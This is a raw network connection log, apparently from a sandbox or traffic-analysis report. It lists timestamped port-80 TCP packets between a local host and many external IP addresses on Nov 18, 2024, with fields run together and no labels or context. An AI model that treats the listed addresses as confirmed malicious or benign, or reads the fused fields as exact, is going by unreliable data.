                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.239334106 CET5010080192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.301110029 CET805009947.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.301688910 CET5009980192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.307215929 CET805009947.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.307326078 CET5009980192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.768210888 CET5010280192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.773216009 CET80501023.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.773327112 CET5010280192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.773525000 CET5010280192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.773566961 CET5010280192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.778568983 CET80501023.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.778580904 CET80501023.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.436223030 CET80501023.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.436394930 CET5010280192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.441498995 CET80501023.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.441554070 CET5010280192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.682796955 CET805010147.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.685847998 CET5010180192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.692801952 CET805010147.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.692878008 CET5010180192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.712944984 CET5010380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.718039036 CET805010334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.718123913 CET5010380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.718875885 CET5010380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.718875885 CET5010380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.723782063 CET805010334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.723802090 CET805010334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.073837042 CET5010480192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.079489946 CET805010435.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.079700947 CET5010480192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.079933882 CET5010480192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.079976082 CET5010480192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.085617065 CET805010435.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.085628033 CET805010435.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.548098087 CET805010334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.548289061 CET5010380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.553759098 CET805010334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.555288076 CET5010380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.561896086 CET5010580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.567754030 CET805010547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.567945957 CET5010580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.567945957 CET5010580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.568195105 CET5010580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.573714972 CET805010547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.573894978 CET805010547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.907140970 CET805010435.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.907291889 CET5010480192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.912513018 CET805010435.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.912580013 CET5010480192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:47.390470028 CET5010680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:47.396328926 CET805010618.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:47.396477938 CET5010680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:47.396617889 CET5010680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:47.396617889 CET5010680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:47.401493073 CET805010618.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:47.401524067 CET805010618.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.058963060 CET805010547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.059153080 CET5010580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.064707041 CET805010547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.064851046 CET5010580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.070992947 CET5010780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.076332092 CET805010718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.076392889 CET5010780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.076498985 CET5010780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.076572895 CET5010780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.081404924 CET805010718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.081423044 CET805010718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.745724916 CET805010718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.745896101 CET5010780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.753705978 CET805010718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.753791094 CET5010780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.772145987 CET5010880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.779618979 CET805010813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.779701948 CET5010880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.779853106 CET5010880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.779870987 CET5010880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.787065983 CET805010813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.787079096 CET805010813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.861454964 CET805010618.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.861713886 CET5010680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.869187117 CET805010618.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.869530916 CET5010680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.282416105 CET5010980192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.287657976 CET8050109208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.287761927 CET5010980192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.288196087 CET5010980192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.288228989 CET5010980192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.293071032 CET8050109208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.293085098 CET8050109208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.932056904 CET8050109208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:49.973692894 CET5010980192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.006220102 CET5010980192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.006247044 CET5010980192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.014864922 CET8050109208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.015011072 CET8050109208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.155575037 CET8050109208.100.26.245192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.208106995 CET5010980192.168.2.7208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.212913990 CET805010813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.213064909 CET5010880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.218584061 CET805010813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.218637943 CET5010880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.227194071 CET5011080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.232085943 CET805011034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.232161045 CET5011080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.232249022 CET5011080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.232268095 CET5011080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.237220049 CET805011034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.237483025 CET805011034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.600308895 CET5011180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.605299950 CET805011144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.605456114 CET5011180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.605565071 CET5011180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.605565071 CET5011180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.610356092 CET805011144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.610368967 CET805011144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.194924116 CET805011034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.195189953 CET5011080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.200474977 CET805011034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.201543093 CET5011080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.206434965 CET5011280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.211308956 CET805011218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.211375952 CET5011280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.211550951 CET5011280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.211550951 CET5011280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.216418982 CET805011218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.216439009 CET805011218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.274024010 CET805011144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.274230003 CET5011180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.279767990 CET805011144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.280065060 CET5011180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.635277987 CET5011380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.640448093 CET805011334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.640585899 CET5011380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.642838955 CET5011380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.642905951 CET5011380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.647671938 CET805011334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.647696018 CET805011334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.468306065 CET805011334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.468554020 CET5011380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.473673105 CET805011334.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.473783970 CET5011380192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.679512978 CET805011218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.680135012 CET5011280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.685619116 CET805011218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.685725927 CET5011280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.694473028 CET5011480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.699398994 CET805011413.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.699537039 CET5011480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.699666023 CET5011480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.699686050 CET5011480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.704631090 CET805011413.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.704648972 CET805011413.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.831729889 CET5011580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.836695910 CET805011518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.836811066 CET5011580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.837021112 CET5011580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.837044001 CET5011580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.842020035 CET805011518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:52.842032909 CET805011518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:53.511061907 CET805011518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:53.511329889 CET5011580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:53.516629934 CET805011518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:53.516773939 CET5011580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.048079967 CET5011680192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.053050041 CET80501163.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.053129911 CET5011680192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.053294897 CET5011680192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.053333998 CET5011680192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.058214903 CET80501163.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.058227062 CET80501163.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.151648998 CET805011413.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.151803017 CET5011480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.158982038 CET805011413.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.159034967 CET5011480192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.164535046 CET5011780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.169406891 CET805011718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.169481039 CET5011780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.169595957 CET5011780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.169617891 CET5011780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.174423933 CET805011718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.174436092 CET805011718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.333226919 CET805010085.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.333364964 CET5010080192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.333394051 CET5010080192.168.2.785.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.338371038 CET805010085.214.228.140192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.832071066 CET805011718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.832232952 CET5011780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.837785959 CET805011718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.837840080 CET5011780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.846604109 CET5011880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.851663113 CET805011818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.851743937 CET5011880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.851847887 CET5011880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.851871014 CET5011880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.856779099 CET805011818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:54.856796026 CET805011818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.019613981 CET80501163.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.019973040 CET5011680192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.027087927 CET80501163.254.94.185192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.027277946 CET5011680192.168.2.73.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.446532965 CET5011980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.451498032 CET805011954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.451611042 CET5011980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.451864004 CET5011980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.451864004 CET5011980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.456743956 CET805011954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.456754923 CET805011954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.539839029 CET8050067165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.540050983 CET5006780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.540050983 CET5006780192.168.2.7165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.545034885 CET8050067165.160.13.20192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.684005976 CET805011818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.684159040 CET5011880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.689625025 CET805011818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.690118074 CET5011880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.695929050 CET5012080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.700834036 CET805012044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.700932980 CET5012080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.701067924 CET5012080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.701088905 CET5012080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.705848932 CET805012044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:55.705919027 CET805012044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.293092012 CET805011954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.293526888 CET5011980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.298719883 CET805011954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:56.299330950 CET5011980192.168.2.754.244.188.177
